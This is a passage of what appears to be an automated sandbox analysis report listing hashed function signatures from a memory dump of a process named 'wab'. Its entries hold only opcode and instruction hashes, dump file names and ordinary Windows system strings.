                                                  • Instruction Fuzzy Hash: FF415C35A1074A9BC7A4DFB4C444AFBB7F4BF45700F00492ED5AAC7240E335A555CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TrustedInstaller
                                                  • API String ID: 0-565535830
                                                  • Opcode ID: cb14ccc260b8346a6db0f73fbf3ef996ad8d5e0602d90ae71b20d87761345f1e
                                                  • Instruction ID: 3c7b7c8eda9e562e65a112349b9e7a07c968ca86f6772d8f026771bc6700d195
                                                  • Opcode Fuzzy Hash: cb14ccc260b8346a6db0f73fbf3ef996ad8d5e0602d90ae71b20d87761345f1e
                                                  • Instruction Fuzzy Hash: 73317036A40659BBDB529BA9CC40FEE7B79EF44750F010069F901EB290D631EE51CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: BinaryName
                                                  • API String ID: 0-215506332
                                                  • Opcode ID: c8de3d666a99513dc5f121b95ab4558036a248f5fdc6a8af8800a118a62f9636
                                                  • Instruction ID: b422cda0abdfcc4036be489c8ce5ec7fff72c2b6b84b3e54ca2331fed3e03d65
                                                  • Opcode Fuzzy Hash: c8de3d666a99513dc5f121b95ab4558036a248f5fdc6a8af8800a118a62f9636
                                                  • Instruction Fuzzy Hash: 0831D476904A29AFDB25CE5EC845FAFB774EF80760F014529E805EB290E730AE14C7E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 1FE3AF2F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                  • API String ID: 0-1911121157
                                                  • Opcode ID: 6102dbc8c2042b203a0de17e54e38be9e7b4279dd60166122cb3505646ce9e8d
                                                  • Instruction ID: f9a6be059fdc1d02ee31bae5be9db9a163aad0f798700a6e346ce078cc120566
                                                  • Opcode Fuzzy Hash: 6102dbc8c2042b203a0de17e54e38be9e7b4279dd60166122cb3505646ce9e8d
                                                  • Instruction Fuzzy Hash: 60313BB6E00654AFD710DF54CC49FAEBBB5FB44B14F118666F50597680D739AC40CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WindowsExcludedProcs
                                                  • API String ID: 0-3583428290
                                                  • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                  • Instruction ID: c0be5431ed236cfaf6791e7863aebf17dcf5205e46a76f38a869a001f936e72e
                                                  • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                  • Instruction Fuzzy Hash: 1221FC7B600226AFCB62DA55C845FAF777DAF917B4F01412AB904DF114DA34ED0587A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • Critical error detected %lx, xrefs: 1FE57027
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Critical error detected %lx
                                                  • API String ID: 0-802127002
                                                  • Opcode ID: 68d26f429610992872b6b5bb62967bc59829920e5ee5ff96d02c93a50aa55916
                                                  • Instruction ID: b04bbc561bfa5011a4d83b1fcb949e2d790248fa3a19c4009cbd9c042e105e8c
                                                  • Opcode Fuzzy Hash: 68d26f429610992872b6b5bb62967bc59829920e5ee5ff96d02c93a50aa55916
                                                  • Instruction Fuzzy Hash: EB115B7AD543488BDB21CFA4D801BEDBBF2EB04718F20422AD165AB291E7755516CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 648923cc8cc8cbae8062d69f66f2a704bc95b023f92b1cf968e632b2e6ba6418
                                                  • Instruction ID: b74d7ca23a32c9d322aa26eae8ac4c98e08642f1578aa4d8adab951e56bb713d
                                                  • Opcode Fuzzy Hash: 648923cc8cc8cbae8062d69f66f2a704bc95b023f92b1cf968e632b2e6ba6418
                                                  • Instruction Fuzzy Hash: 6C2293356447568FCB09CF28C490A6AB3E1FFC9728F144A6DE996CB391E734E841CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d56e2db9ee6159d7cd2b57ea5bfa8837e1159cbd9a5d4e6f5ed3dad7a2693db5
                                                  • Instruction ID: 91bc4235f96bb8238a77f9bb819fc8512006bc3ff90dd7b9b3bb96b7d50063ac
                                                  • Opcode Fuzzy Hash: d56e2db9ee6159d7cd2b57ea5bfa8837e1159cbd9a5d4e6f5ed3dad7a2693db5
                                                  • Instruction Fuzzy Hash: 0122CF70F0025ADBCB54CFA5C4919BEFBF2FF88314B15816AE845AB241E735E941DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 700f0c0f97a8cb29c3551f7e1da274e59074f68df7fb8007fd3f699d3bb19dac
                                                  • Instruction ID: 27f3b45490cc85aab86d8d7717eb9be7a8f49a3d4ad4f633a9179776efedca17
                                                  • Opcode Fuzzy Hash: 700f0c0f97a8cb29c3551f7e1da274e59074f68df7fb8007fd3f699d3bb19dac
                                                  • Instruction Fuzzy Hash: BF328CB5A01345CFCB55CFA8C480BAAB7F1FF88314F10866AE955AB391DB35E841CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                  • Instruction ID: 514f76faa0a07d97d70fcb74abdb64ac1e46d0fd53369b0a44af1c7ecfd40263
                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                  • Instruction Fuzzy Hash: 4EF17874E0020A9BDF55DFA5C990BEEB7B6BF49714F09812EE845EB250E734E841CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa23379e645b16159a651e83903f75d772df5eb8d8de38f4d79b9f983d27d4f0
                                                  • Instruction ID: b7293208e09a65096e227e5b5c5b14230be6500da1b80701babb4832c778fc0b
                                                  • Opcode Fuzzy Hash: fa23379e645b16159a651e83903f75d772df5eb8d8de38f4d79b9f983d27d4f0
                                                  • Instruction Fuzzy Hash: 8DE1EF75E00748DFCB65CFA9C984AADBBF1BF48314F20456EE556AB260D731A842CF20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b7d178ee8f18fbaf3fddc842cd26992206d0653997baa5183302f88f55885d0d
                                                  • Instruction ID: b46bf7d592a3c58a117751f54094073e9dac192eb0ee330f714caaf94a8b57f3
                                                  • Opcode Fuzzy Hash: b7d178ee8f18fbaf3fddc842cd26992206d0653997baa5183302f88f55885d0d
                                                  • Instruction Fuzzy Hash: BFD1D835A013668FDBA4CF24C8A0BB9B7B5BF46314F0541ADD80A97281DB35BD85CF62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d90af347a5759564568c0f1da01be06f9b4dab48881363a61589ab61ec2a9ea1
                                                  • Instruction ID: fb5e6d7b005cbed1a5c1250d18cc5fc6e39a3705a1a405fcaa0ff7e4a57792b9
                                                  • Opcode Fuzzy Hash: d90af347a5759564568c0f1da01be06f9b4dab48881363a61589ab61ec2a9ea1
                                                  • Instruction Fuzzy Hash: 89C15C74E04359DFDB54CFE8C884AADBBB9FF89304F10422EE409AB285E771A841DB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ef01da65c1ec4712173e9099f0b55718db3c4e9e5880ed1b793ac93a2fe7077
                                                  • Instruction ID: 6ee40a851e71a83b6ab2295a016693428c8669e6b8ace9968b1009b5ee0a8f66
                                                  • Opcode Fuzzy Hash: 6ef01da65c1ec4712173e9099f0b55718db3c4e9e5880ed1b793ac93a2fe7077
                                                  • Instruction Fuzzy Hash: A48182B5A007169BDB54CFA9C980EBEBBF5FB48700F15852EE445D7640E734E941CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                  • Instruction ID: b0f0c7ec84809f701f00d67ec5e3bd6363ea5213b0e27e361461ba6052be18fb
                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                  • Instruction Fuzzy Hash: EA818275E402099FCF18CF99C890AAEB7F2FF88724F158569D9159B384EB34EA01CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b1eb560bdd18edadb1dbbda3b6cafca23f34dbedc7a49b5136fac833be4afcf
                                                  • Instruction ID: fc5cf5dcf2b629775f3f87a34fa19238752b31f9a63466e0ad211382b1a46975
                                                  • Opcode Fuzzy Hash: 3b1eb560bdd18edadb1dbbda3b6cafca23f34dbedc7a49b5136fac833be4afcf
                                                  • Instruction Fuzzy Hash: 4C716D75E053429BDB90CE25CD80F7EB7E4BB44350F12492AE996DB240E730E946CB93
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                  • Instruction ID: 274bd204cc405c9204a47618917f8cbb27f8a9d4f13b0d082775df5c4af6cf1c
                                                  • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                                  • Instruction Fuzzy Hash: 69817C75A007459FC715CF69C980BAABBF5FF48310F10866AE996CB291D730E941CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1db628146187f693057eadddabf2ab0f8697415445756002d73e9c5e562a3d0d
                                                  • Instruction ID: 363beb26b265b7bd8e4892e146c01e3073bb9c004bdbf331cd75fad952ff2757
                                                  • Opcode Fuzzy Hash: 1db628146187f693057eadddabf2ab0f8697415445756002d73e9c5e562a3d0d
                                                  • Instruction Fuzzy Hash: 9561A374B8021D9BDF04DE64C980BFE77BAAF84338F154229E81397294EB34E941C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51928e364e80e849dbad0015d48ae62f52775e0eaf97f76abe11cf97238d232b
                                                  • Instruction ID: 9ddbf46af5134ca72adc0c450a5561b6294eb46a62f0382c60093b16bbe0eb92
                                                  • Opcode Fuzzy Hash: 51928e364e80e849dbad0015d48ae62f52775e0eaf97f76abe11cf97238d232b
                                                  • Instruction Fuzzy Hash: 9871C375D042569FCB04CF69C844AFABBF5FF85305F0580A9E894DB251E339EA45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7643fa9e860edb99f784082e183e274123a639e992e57995bb238b20bbb50f74
                                                  • Instruction ID: 3add7e76526b9d0af476ba9bb871f5c573d01ba9d2065e5471fb82d5fe8233c4
                                                  • Opcode Fuzzy Hash: 7643fa9e860edb99f784082e183e274123a639e992e57995bb238b20bbb50f74
                                                  • Instruction Fuzzy Hash: C5619E75A047469FCB48DF68C881BAEB7B5FF09314F11466AE511EB2D0EB31E901CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 007336c3c1be235c4afe92326b9fe0310cab4cf00a041c2064c054827a0613f6
                                                  • Instruction ID: e2de0b605b8c8c66fa3cdc33ca63f28044dcdd795bf27f0fbbbbae45fa70e076
                                                  • Opcode Fuzzy Hash: 007336c3c1be235c4afe92326b9fe0310cab4cf00a041c2064c054827a0613f6
                                                  • Instruction Fuzzy Hash: BA817072A04357CFCB04DFA8C585BAD77F1BB89324F11926ADC00AB281D776AD51CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                  • Instruction ID: 53b4c7a6677b2d168af638313ddf948ec002d7c10520eb5dfa3cba3353b00eed
                                                  • Opcode Fuzzy Hash: c039dac4d0c79e4adae2489b980ce8c838fb626483c5f982736a6a658be53934
                                                  • Instruction Fuzzy Hash: 80716676551F828BD3A28F60CA40F32BBE4BF91761F110B2DD9D64A9E1E730B442DB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba379b0cc0bd46409f8e9c189251243dbeacdc06dfbe1db894a1db61d74fd04e
                                                  • Instruction ID: 8d539dd65e17d145791ce5ec696e2dd343799d83427cd3ddb96c769ae93cc2c7
                                                  • Opcode Fuzzy Hash: ba379b0cc0bd46409f8e9c189251243dbeacdc06dfbe1db894a1db61d74fd04e
                                                  • Instruction Fuzzy Hash: 3251CCB5600781DFD761DF65C884B6AB7F8FB81319F100A2EE04287A81D7B5F845CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                  • Instruction ID: c894aa7a843e795d458432abd84d927bcc935487c0257d4345429d3afce8b8ea
                                                  • Opcode Fuzzy Hash: 6851680e3e689f07d8311deac1a97bfa9ae5f47be04d730b0759b45304561ce1
                                                  • Instruction Fuzzy Hash: D2518176F0068ADFCB04DFA8C9C06EDBBB5FB89304F158179D955BB200E636A941CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2637577363.000000001FD70000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FD70000, based on PE: true
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FE9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2637577363.000000001FF0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_1fd70000_wab.jbxd
                                                  Similarity
